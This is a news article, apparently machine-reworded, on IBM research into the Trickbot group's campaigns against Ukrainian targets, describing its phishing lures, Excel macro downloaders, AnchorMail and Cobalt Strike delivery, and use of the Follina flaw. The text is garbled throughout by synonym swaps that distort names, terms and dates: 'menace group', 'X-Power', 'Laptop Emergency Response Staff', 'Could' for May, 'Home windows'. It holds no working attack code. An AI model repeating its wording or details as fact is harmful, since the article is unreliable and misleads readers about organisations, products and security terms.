In a break from precedent, Russia’s hitherto purely financially motivated Trickbot menace group has systematically been attacking targets in Ukraine over the previous three months, apparently in assist of Russian authorities pursuits within the area.
Researchers from IBM’s X-Power menace intelligence group this week stated that they had uncovered two campaigns — and analyzed 4 others that Ukraine’s Laptop Emergency Response Staff (CERT-UA) disclosed — the place Trickbot went after targets in Ukraine. The campaigns started after Russia’s invasion of Ukraine in February and have focused Ukrainian state authorities, authorities organizations, particular people, and the overall inhabitants. A number of of the assaults have concerned phishing emails with varied themes designed to seize the eye of Ukrainian customers — included some which are war-related.
The assaults spotlight an unprecedented shift for Trickbot, and it is notable as a result of menace teams in former Soviet Union states have sometimes averted attacking targets in one another’s nations, IBM stated.
Previous to the Russian invasion, ITG23, which is the identify by which IBM tracks Trickbot, had not been recognized to focus on Ukraine. “A lot of the group’s malware was even configured to not execute on methods if the Ukrainian language was detected,” IBM stated in a report summarizing its findings this week. “ITG23’s campaigns towards Ukraine are notable because of the extent to which this exercise differs from historic precedent and the truth that these campaigns appeared particularly geared toward Ukraine with some payloads that recommend a better diploma of goal choice.”
A number of Malware Instruments
IBM stated it has noticed Trickbot distributing a number of recognized malware instruments similar to IcedID, Cobalt Strike, AnchorMail, and Meterpreter in its assaults on Ukrainian targets. A number of the assaults concerned using new instruments similar to a malicious Excel downloader, a self-extracting archive for dropping varied malware payloads and a brand new malware encryption and obfuscation device.
One of many two Trickbot campaigns that IBM uncovered was in early Could. In these assaults, IBM noticed the menace actor utilizing a weaponized Excel file to obtain its AnchorMail backdoor on compromised methods. AnchorMail is a revamped model of Trickbot’s AnchorDNS, a backdoor that members of the carefully affiliated Conti group have been utilizing to deploy Conti ransomware. IBM X-Power researchers have beforehand described the malware as notable for speaking with its command-and-control (C2) server utilizing the DNS protocol.
The second current Trickbot marketing campaign that IBM X-Power researchers noticed occurred seemingly in late Could or early June. In that marketing campaign, Trickbot actors used an ISO picture file — or archive file containing the contents of an optical disk — as a part of an assault chain to drop the Cobalt Strike post-exploit assault package on the right track system. In June, Trickbot customers had been noticed exploiting the so-called “Follina” zero-day bug within the Home windows Microsoft Assist Diagnostic Device (MSDT) to deploy Cobalt Strike.
The campaigns that CERT-UA disclosed, and which IBM X-Power researchers analyzed, concerned Trickbot makes an attempt to deploy IcedID, a banking Trojan turned malware distributor; Metasploit assault payload, Meterpreter; and Cobalt Strike. In 5 of the six noticed campaigns, Trickbot actors straight downloaded Cobalt Strike, AnchorMail, or Meterpreter on the right track methods — one other break from their ordinary behavior of deploying these instruments as secondary payloads. IBM stated the swap suggests “these assaults are a part of focused campaigns throughout which ITG23 is prepared to instantly deploy higher-value backdoors.”
IBM described the brand new malicious Excel downloader that Trickbot is utilizing within the Ukrainian assaults as designed to obtain malware from a hard-coded URL. The downloader is saved as a macro throughout the Excel file and runs mechanically if the file is opened — supplied the person has macros enabled. The brand new dropper for AnchorMail that IBM noticed is within the type of a WinRAR Self Extracting Archive. The dropper is rigged to extract and execute a script for constructing and configuring AnchorMail on contaminated methods.
Trickbot is a extremely profitable menace group that has been round since no less than 2016. The group initially used its eponymously named malware to steal credentials to banking accounts. Through the years, the group advanced right into a kind of preliminary entry dealer and a distributor for a number of ransomware and malware instruments, most notably Conti and Ryuk and Emotet. Trickbot is used variously for stealing information, enabling cryptomining, enumerating methods, and different malicious actions.
Courtroom paperwork in reference to the arrest of a key member of the group final 12 months confirmed that just about 20 cybercriminals — together with a number of malware specialists — collaborated in constructing the malware. A large 2020 worldwide legislation enforcement operation to take the menace actor down quickly disrupted its actions however did not cease them.
